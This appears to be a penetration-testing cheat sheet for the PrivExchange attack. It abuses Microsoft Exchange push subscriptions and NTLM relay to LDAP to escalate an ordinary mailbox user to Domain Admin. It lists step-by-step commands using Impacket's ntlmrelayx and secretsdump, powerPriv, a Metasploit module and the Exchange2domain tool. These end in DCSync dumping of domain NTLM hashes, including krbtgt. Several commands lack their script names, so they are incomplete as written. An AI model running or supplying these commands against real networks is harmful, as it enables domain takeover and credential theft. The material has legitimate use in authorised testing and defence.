PEnTest – PrivExchange

xchange your privileges for Domain Admin privs by abusing Exchange.
⚠ You need a shell on a user account with a mailbox.

  1. Exchange server hostname or IP address
    pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
  2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). -t ldap://dc01.domain.local --escalate-user username
  3. Subscription to the push notification feature (using or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server’s to send back its NTLMv2 hash to a controlled machine.
    python -ah xxxxxxx -u xxxx -d xxxxx
    python -ah mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
    powerPriv -targetHost corpExch01 -attackerHost -Version 2016
  4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user’s NTLM hash
    python xxxxxxxxxx -just-dc
    python lab/buff@ -ntds ntds -history -just-dc-ntlm
  5. Clean your mess and restore a previous state of the user’s ACL
    python --restore ../aclpwn-20190319-125741.restore

Alternatively you can use the Metasploit module

use auxiliary/scanner/http/exchange_web_server_pushsubscription

Alternatively you can use an all-in-one tool : Exchange2domain.

git clone 
python -ah attackterip -ap listenport -u user -p password -d -th DCip MailServerip
python -ah attackterip -u user -p password -d -th DCip --just-dc-user krbtgt MailServerip


Add a Comment

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *